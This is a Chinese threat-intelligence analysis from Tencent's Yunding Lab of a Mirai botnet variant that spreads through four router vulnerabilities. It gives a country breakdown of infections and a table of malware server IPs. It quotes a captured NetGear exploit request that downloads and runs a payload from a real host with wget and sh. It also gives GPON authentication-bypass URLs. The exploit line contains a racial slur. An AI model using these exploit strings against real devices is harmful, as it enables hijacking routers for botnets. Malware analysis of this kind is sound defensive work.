Loading [MathJax]/jax/input/TeX/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >IoT 分析 | 路由器漏洞频发,mirai 新变种来袭

IoT 分析 | 路由器漏洞频发,mirai 新变种来袭

作者头像
云鼎实验室
发布于 2018-11-22 05:23:35
发布于 2018-11-22 05:23:35
2.8K0
举报

作者:murphyzhang、xmy、hjchjcjh

 前言:

近期腾讯安全云鼎实验室听风威胁感知平台监测发现一款攻击路由器的蠕虫病毒,经过分析,认定此款蠕虫是 mirai 病毒的变种,和之前的 mirai 病毒不同,该蠕虫不仅仅通过初代 mirai 使用的 telnent 爆破进行攻击,更多通过路由器漏洞进行攻击传播。通过溯源可以发现,本次捕获的蠕虫来自于美国拉斯维加斯的一位名为 Philly 的黑客。

一、Playload 与漏洞分析

样本在传播和攻击过程中涉及到4个 PlayLoad ,均针对路由器进行攻击,我们会对相关漏洞做一个整体性的介绍和分析。

表  PlayLoad 情况 ▽

被攻击设备

设备型号

漏洞编号

NetGear路由器

DGN1000、DGN2000

CNNVD-201306-024

GPON光纤路由器

H640GR-02、H640GV-03、H640GW-02、H640RW-02、H645G

CVE-2018-10561/62

华为HG532系列路由器

HG532

CVE-2017-17215

linksys多款路由器

Cisco Linksys E4200 、EA4500、EA3500、EA2700、E1000、E2100L

CNVD-2014-01260

图 影响设备分布

数据来源:腾讯安全云鼎实验室

上图是几款路由器漏洞影响的国家范围,中国、俄罗斯、日本和美国是受灾较为严重的国家。与国家发展程度、网络普及程度有一定关系,与上述几款路由器的销售区域有着较强的关联。由于国产设备多,安全性不高等原因,我国未来 IoT 安全面临着巨大的挑战。

下面我们针对这四个漏洞分别进行介绍:

01

NetGear 路由器任意执行漏洞

(CNNVD-201306-024)

1)漏洞分析:

POC 通过 GET 方法执行 setup.cgi,通过 todo 命令执行 syscmd,通过 syscmd 来执行下载和执行病毒的命令。

'GET/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://46.17.47.82/gvv+-O+/tmp/nigger;sh+nigger+netgear&curpath=/&currentsetting.htm=1 HTTP/1.1\r\n\r\n'

代码如下:

A、执行 setup.cgi 后执行 setup_main:

B、使用 GET 和 POST 方法都可以提交 POC:

Todo 参数后面直接调取相关的文件执行,没有做任何过滤,这里也是被利用的地方,直接调用 syscmd 来执行自己想要的命令。

2)传播情况:

图 NetGear DGN 设备远程任意命令执行漏洞攻击统计 ▽

数据来源:腾讯安全云鼎实验室

NetGear 漏洞在俄罗斯非常泛滥,可以推断 NetGear 设备在俄罗斯有很大的保有量。

02

GPON 光纤路由器命令执行漏洞

(CVE-2018-10561/62)

1)漏洞分析:

设备上运行的 HTTP 服务器在进行身份验证时会检查特定路径,攻击者可以利用这一特性绕过任意终端上的身份验证。

通过在 URL 后添加特定参数 ?images/,最终获得访问权限:

http://ip:port/menu.html?images/

http://ip:port/GponForm/diag_FORM?images/

图  GPONPlayLoad ▽

2)传播情况:

图 GPON设备远程任意命令执行漏洞攻击统计

数据来源:腾讯安全云鼎实验室

此漏洞影响范围较广,对于中国,格鲁吉亚 还有埃及的影响较为广泛。中国美国的光纤发展迅速,埃及和格鲁吉亚受到中国影响,光纤发展速度也很快,也是他们受影响设备多的一个原因。

03

华为 HG532 系列路由器远程命令执行漏洞

(CVE-2017-17215)

1)漏洞分析:

图 HG532 PlayLoad ▽

我们可以观察 POC 首先提交一个身份认证信息,之后 upgrade 里面的 NewStatusURL 标签中执行了想要执行的命令。模块在 upnp 中,我们找到 upnp 模块,并找到 NEwStatusURL 标签,代码直接通过 SYSTEM 执行命令(upg -g -u %s -t ‘Firmware Upgrade....’),没有做任何过滤

2)传播情况:

图 华为 HG532 设备远程命令执行漏洞攻击统计 ▽

数据来源:腾讯安全云鼎实验室

图 CVE-2017-17215 世界影响范围

数据来源:腾讯安全云鼎实验室

通过华为路由器的受感染情况,可以看出,华为 HG532 设备在中国、俄罗斯、日本和美国有较好的销量,日本和俄罗斯受到的影响更大,可见中国制造对周边国家有着较大的影响力。

04

Linksys 多款路由器 tmUnblock.cgi ttcp_ip 参数远程命令执行漏洞

(CNVD-2014-01260)

1)漏洞分析:

多款Linksys路由器没有被正确过滤 'ttcp_ip' 参数值,在 tmUnblock.cgi 脚本的实现上存在安全漏洞,经过身份验证的远程攻击者可利用此漏洞执行任意命令。受影响产品包括但不局限于:

E4200 E3200 E3000 E2500 E2100L E2000 E1550 E1500 E1200 E1000 E900 E300 WAG320N WAP300N WAP610N WES610N WET610N WRT610N WRT600N WRT400N WRT320N WRT160N WRT150N

2)传播情况:

图 Linksys 多款路由器设备远程命令执行漏洞攻击统计

数据来源:腾讯安全云鼎实验室

相关漏洞样本的下载地址很固定,基本分布于拉斯维加斯、新加坡、莫斯科阿姆斯特丹这四个城市。针对路由器的黑产基本在这几个地方比较活跃。

图 病毒服务器分布图

数据来源:腾讯安全云鼎实验室

详细的服务器分布信息如下表所示:

表 捕获到的相关样本下载 IP 地址

漏洞

IP 地址

地理位置

GPON光纤路由器命令执行漏洞(CVE-2018-10561/62)

205.185.122.121(l.ocalhost.host)

美国内华达州拉斯维加斯

46.29.163.28(cnc.methaddict.xyz)

俄罗斯莫斯科

46.17.47.82

俄罗斯莫斯科

46.29.166.125

俄罗斯莫斯科

194.182.65.56

捷克

128.199.137.201

新加坡

185.244.25.176

荷兰北荷兰省阿姆斯特丹

159.89.204.166

新加坡

206.189.12.31

荷兰北荷兰省阿姆斯特丹

128.199.222.37

新加坡

185.244.25.188

荷兰北荷兰省阿姆斯特丹

185.223.163.17

爱沙尼亚

142.93.175.10

德国黑森州法兰克福

46.183.218.247

拉脱维亚

185.244.25.194

荷兰北荷兰省阿姆斯特丹

176.32.33.123

俄罗斯莫斯科

华为 HG532 系列路由器远程命令执行漏洞(CVE-2017-17215)

209.141.33.86

美国内华达州拉斯维加斯

167.88.161.40

美国内华达州拉斯维加斯

213.183.63.181

保加利亚索非亚市州索非亚

195.62.53.38

俄罗斯莫斯科

Linksys多款路由器tmUnblock.cgi ttcp_ip参数远程命令执行漏洞(CNVD-2014-01260)

209.141.33.119

美国内华达州拉斯维加斯

209.141.50.26

美国内华达州拉斯维加斯

185.244.25.222

荷兰北荷兰省阿姆斯特丹

二、样本分析

样本 md5:

099b88bb74e9751abb4091ac4f1d690d

源地址统计(112.28.77.217):13次,主要攻击了81、8080端口

下载IP:46.17.47.82

样本与 mirai 是同一个家族的样本,是 mirai 病毒的一个变种。代码结构和解密后的字符串均非常相似,不同的是此变种使用了3个路由器漏洞进行传播。

Mirai bot 代码的结构如下:

包含了攻击模块、扫描模块和结束模块三个大模块,此样本代码结构与 mirai 一样,只是相比增加了三种针对路由器的扫描模块。

与以前的mirai不同,这里检测 /dev/watchdog,/dev/misc/watchdog, /dev/FTWDT101_watchdog,/dev/FTWDT101\ watchdog,/dev/FTWDT101/watchdog,/sbin/watchdog,/bin/watchdog,/dev/watchdog0,/etc/default/watchdog,/etc/watchdog 等来避免重启。

相比传统的mirai(/dev/watchdog,/dev/misc/watchdog)多了很多新的 watchdog 检测。

同时包含了 Linux.Okiru 用来检测的路径(/dev/FTWDT101_watchdog,/dev/FTWDT101\ watchdog)。

攻击服务器包含了很多相关的文件,各个操作系统平台上的,不同版本的文件。

样本溯源:

下图 POC 中包含了相关的下载地址:

通过访问链接 46.17.47.82/cutie,发现其中包含了真正的下载链接。

保存的路径为:

/tmp/gdf,/tmp/gxy,/tmp/dhf,/tmp/ttb;

再直接访问根目录,包含了一条 Twitter 地址:

该 Twitter 的作者 Philly 是一个美国人,病毒存放的路径为 nigr(Philly 的自称),从 Twitter 中未发现直接与蠕虫相关的推文。

图 相关 Twitter 截图 ▽

关于样本捕获:

通过腾讯安全云鼎实验室听风威胁感知平台进行捕捉样本,听风威胁感知平台是云鼎实验室在全球多个节点部署的蜜罐网络集群,用于捕获真实的恶意流量,每天捕获数亿次的各类攻击请求。

相关捕捉界面如下:

参考文档:

https://www.freebuf.com/vuls/171457.html

https://www.linuxidc.com/Linux/2014-02/97171.htm

https://xlab.tencent.com/cn/2018/01/05/a-new-way-to-exploit-cve-2017-17215/

腾讯安全云鼎实验室 关注云主机与云内流量的安全研究和安全运营。利用机器学习大数据技术实时监控并分析各类风险信息,帮助客户抵御高级可持续攻击;联合腾讯所有安全实验室进行安全漏洞的研究,确保云计算平台整体的安全性。相关能力通过腾讯云开放出来,为用户提供黑客入侵检测和漏洞风险预警等服务,帮助企业解决服务器安全问题。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2018-11-22,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 云鼎实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
快讯 | 华为IoT设备CVE-2017-17215的漏洞利用方法被公开在Pastebin上
Satori和Brickerbot攻击中被使用的华为路由器exp被圣诞老人公布在了Pastebin上。 介绍 根据NewSky Security的博客,黑客在Pastebin上公开发布了华为漏洞CVE-2017-17215的exp代码。这个漏洞已经被两个不同的物联网僵尸网络用来攻击,即Satori和Brickerbot。 CVE-2017-17215漏洞存在于华为HG532路由器中,由Checkpoint研究员在Satori零日攻击中发现,他们并没有公开PoC代码,以防被黑客使用。但由于最近攻击代码被
FB客服
2018/02/26
1K0
快讯 | 华为IoT设备CVE-2017-17215的漏洞利用方法被公开在Pastebin上
两起僵尸网络Mirai样本分析
2019年6月26日蜜罐系统监控到两起Mirai的物联网蠕虫活动情况,自2017年11月23日Check Point研究人员发现华为家用路由器HG532存在0day漏洞(CVE-2017-17215),可以远程执行任意代码,Mirai蠕虫病毒就利用该漏洞进行大肆传播,本文会结合蜜罐捕获的攻击证据对该蠕虫进行技术分析,重点分析该蠕虫是如何利用该漏洞进行传播的。整个攻击流程如下:
FB客服
2019/07/17
9550
两起僵尸网络Mirai样本分析
复现|路由器命令执行
上次有小伙伴反馈说,摄像头的仿真部分写的不详细,正好最近在先知上看到了ONESHELL师傅的文章「见参考链接1」,所以今天我们就以这台路由器为例子,使用QEMU仿真模拟并分析该漏洞的成因「固件下载后台回复: 华为路由器 」
物联网安全小编
2021/07/07
1.6K1
复现|路由器命令执行
新的Mirai僵尸网络至少利用了三个全新漏洞
Fortinet的安全专家发现了一种新的变体Mirai僵尸网络,称为“Wicked Mirai”,它包括新的漏洞同时传播一个新的僵尸程序。
FB客服
2018/07/30
5520
新的Mirai僵尸网络至少利用了三个全新漏洞
Huawei HG532 系列路由器远程命令执行漏洞分析
English version: https://paper.seebug.org/508/
Seebug漏洞平台
2018/03/13
1.4K0
Huawei HG532 系列路由器远程命令执行漏洞分析
僵尸网络Mirai最新变种Satori : 利用0day“绑架”华为家用路由器HG532
时隔多日,2016 年 10 月开始活跃的 Mirai 僵尸网络创始人即便已经锒铛入狱,最近可能又将占据头条。之前在12月初 FreeBuf 就已经在关注其最新的变种Satori(觉醒)的“凌空出世”——Satori(觉醒)新僵尸网络出现,在过去的12个小时内已经激活超过28万个不同的IP,而这两天对该事件的后续报道也正在进行。 Check Point 安全研究人员在过去半个月内仔细观察了这次僵尸网络的感染过程,也观察到一些有趣的活动。这次的 Satori(觉醒),感染IoT的速度非常快,在极短的时间内就达
FB客服
2018/02/26
7970
僵尸网络Mirai最新变种Satori : 利用0day“绑架”华为家用路由器HG532
Routersploit----路由器攻击工具
Routersploit是一款集成了很多路由器已存在漏洞的工具,用python编写。可以快速扫描路由器存在的漏洞且可以快速利用漏洞攻击路由器。 其实和MSF(metasploit framework)相似,用法也基本一样。
cultureSun
2023/05/18
2K0
新漏洞正被在野利用,影响数百万路由器
CVE-2021-20090是一个由Tenable发现并在2021年8月3日公布的漏洞。现在,研究人员发现了其正在被在野利用。
FB客服
2021/08/24
7550
物联网设备的几种固件仿真方式
QEMU是比较老的开源固件仿真工具,现如今的很多仿真工具大多都是在此框架的基础上进行修改或是优化。QEMU有多种模式,比如User mode、System mode、KVM Hosting、Xen Hosting。在实际的仿真过程中主要使用的其实就是User mode、System mode,也就是用户模式和系统模式。用户模式就是QEMU运行针对不同指令编译的单个Linux或Darwin/macOS程序。系统模式就是QEMU模拟一个完整的计算机系统,包括外围设备。
绿盟科技研究通讯
2021/09/27
5.5K0
利用主流路由器漏洞传播,Mirai DDoS 恶意软件持续活跃
Bleeping Computer 网站消息,基于 Mirai 的 DDoS 恶意软件僵尸网络 IZ1H9 近期又开始活跃了,为 D-Link、Zyxel、TP-Link、TOTOLINK 等 Linux 路由器“添加”了 13 个新有效载荷。
FB客服
2023/10/17
4420
利用主流路由器漏洞传播,Mirai DDoS 恶意软件持续活跃
思科称俄罗斯大规模恶意软件攻击已经蔓延到全球50万台路由器
思科表示,俄罗斯政府可能启动了一项复杂的恶意软件攻击行动,在全球54个国家(包括美国)至少有50万台路由器和其他设备受到感染,Talos的美国安全研究人员和思科的安全威胁研究团队认为,这种威胁与APT28直接相关。 APT28也被称为Fancy Bear,是2016年美国总统竞选期间负责黑客事件的两个俄罗斯团队之一。 据Talos博客称,虽然名为V**Filter的恶意软件袭击了数十个国家,但现在它以“惊人的速度”瞄准了乌克兰设备。 受V**Filter影响的设备包括Links
SDNLAB
2018/06/11
5980
Huawei HG532 系列路由器远程命令执行漏洞分析
作者:fenix@知道创宇404实验室 背 景 华为 HG532 系列路由器是一款为家庭和小型办公用户打造的高速无线路由器产品。 2017/11/27,Check Point 软件技术部门报告了一个华为 HG532 产品的远程命令执行漏洞(CVE-2017-17215) [1] https://research.checkpoint.com/good-zero-day-skiddie/。 该漏洞在被报告前,互联网上产生了大量未被关注的此类漏洞攻击利用包,遍及全球多个国家。Payload 已被证实是知名
Seebug漏洞平台
2018/03/30
8770
Huawei HG532 系列路由器远程命令执行漏洞分析
三款恶意软件同时目标锁定路由器
近期发现了3款恶意软件变种——Neko,Mirai和Bashlite。在2019年7月22日,我们发现了Neko僵尸网络的恶意软件样本,并马上开始对其进行分析,接下来我们又发现了另外一个样本,相比之前增加了额外的漏洞利用方法。7月30日,又出现了一个名为“Asher”的Mirai变种,而在这之后,又发现了一个名为“Ayedz”的Bashlite变种。列出的这些恶意软件变种可以将路由器感染为僵尸网络中的设备,能够发起分布式拒绝服务(DDoS)攻击。
FB客服
2019/09/03
1.4K0
三款恶意软件同时目标锁定路由器
五年之后的回顾--磊科路由器后门利用情况分析
磊科路由器后门是由趋势科技的安全研究人员[1]在2014年发现的,当时给出的暴露数量在200万台以上。在5年后的今天,我们的威胁捕获系统每天依旧可以捕获到对于该漏洞的利用。因此,我们将在本文中对其暴露情况和漏洞利用情况进行分析。
绿盟科技研究通讯
2019/12/11
1.7K0
五年之后的回顾--磊科路由器后门利用情况分析
2018 年 IoT 那些事儿
本文作者:murphyzhang、xmy、fen 2018年,是 IoT 高速发展的一年,从空调到电灯,从打印机到智能电视,从路由器到监控摄像头统统都开始上网。随着 5G 网络的发展,我们身边的 IoT 设备会越来越多。与此同时,IoT 的安全问题也慢慢显露出来。 腾讯安全云鼎实验室对 IoT 安全进行了长期关注,本文通过云鼎实验室听风威胁感知平台[注1]收集的 IoT 安全情报进行分析,从 IoT 的发展现状、IoT 攻击的常见设备、IoT 攻击的主要地区和 IoT 恶意软件的传播方式等方面进行介绍。
云鼎实验室
2018/12/30
1.2K0
2018 年 IoT 那些事儿
花25美元买个硬件就能破坏Starlink安全保护?Starlink:会发布更新
大数据文摘授权转载自AI前线 作者:Matt Burgess 编译:核子可乐、冬梅 从 2018 年开始,马斯克已经先后把 3000 多颗 Starlink 小型卫星送入地球轨道。由此建立的卫星系统将互联网连接推送到地球上以往无法覆盖的区域,也成为俄乌战争期间重要的信息传输载体。随着卫星互联网行业的蓬勃发展,Starlink 后续还将继续发射数千颗卫星。但在一片欣欣向荣的背后,卫星网络也与其他新兴技术一样,面临着恶意黑客的潜在威胁。 攻击 Starlink 的成本,可能仅需要 25 美元 来自比利时鲁汶大学
大数据文摘
2022/08/26
7260
花25美元买个硬件就能破坏Starlink安全保护?Starlink:会发布更新
《2023年企业IoT和OT威胁报告》:物联网恶意软件攻击增长400%
在这个万物互联的时代,物联网(IoT)设备无疑改变了我们生活、工作和管理运营技术(OT)环境的方式。总体而言,到2027年,全球物联网设备数量预计将超过290亿,比2023年的167亿大幅增加。
FB客服
2023/12/02
2.1K0
《2023年企业IoT和OT威胁报告》:物联网恶意软件攻击增长400%
【格物猎踪】压缩?base64?10个漏洞?攻击物联网设备愈发隐蔽!
近期,我们在排查绿盟威胁捕获系统相关日志的过程中发现了一种针对物联网设备和structs2的新型攻击手法,攻击者通过压缩样本、base64编码传输等方式隐藏其样本和执行的指令。自2020年12月17日起,从物联网设备到structs2,攻击者已利用10个漏洞投递相关样本。
绿盟科技研究通讯
2021/02/24
7950
【格物猎踪】压缩?base64?10个漏洞?攻击物联网设备愈发隐蔽!
资讯|新勒索病毒Petya已席卷全球 多家跨国企业陷入瘫痪
据外电报道,在勒索病毒WannaCry今年5月刚刚席卷150多个国家后,代号为Petya的勒索病毒又开始肆虐,袭击了美国和荷兰的码头运营商,破坏了乌克兰的政府系统,并让俄罗斯石油公司(Rosneft)、全球最大传播集团WPP等公司的运营陷入瘫痪。 根据周二早些时候的报道,俄罗斯和乌克兰两国约有80多家公司被Petya病毒感染。 该病毒锁住大量的电脑,要求用户支付300美元的加密数字货币才能解锁。莫斯科的网络安全公司Group-IB透露,许多电信运营商和零售商也遭到了Petya的攻击,该病毒传播方式与Wan
灯塔大数据
2018/04/04
8430
资讯|新勒索病毒Petya已席卷全球 多家跨国企业陷入瘫痪
家用路由器,已遭黑客攻击!
知道创宇安全研究团队联合央视做了关于家用路由器安全的专题“路由器暗埋网络安全地雷”已在CCTV13播出,最新的家用路由器攻击已经开始盯上网银了。而中国电信的安全团队(SOC)在去年也曾携手腾讯、阿里、
大数据文摘
2018/05/22
4.4K0
推荐阅读
相关推荐
快讯 | 华为IoT设备CVE-2017-17215的漏洞利用方法被公开在Pastebin上
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档